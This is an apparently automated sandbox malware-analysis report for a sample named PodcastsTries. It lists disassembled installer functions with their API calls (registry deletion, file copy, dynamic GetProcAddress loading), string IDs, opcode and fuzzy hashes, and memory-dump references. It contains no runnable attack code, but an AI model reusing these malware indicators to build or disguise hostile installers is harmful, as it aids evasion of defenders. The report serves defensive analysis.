                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                          • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                          Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                          • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                          • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                                          Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                          • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                                          Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                                          Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                          • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                          • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                                          Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                          • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                                          Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                                          Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                          • String ID: Version
                                                                                                                                                                                                                                                                                                          • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                          • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                          • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                                          Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                                          Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
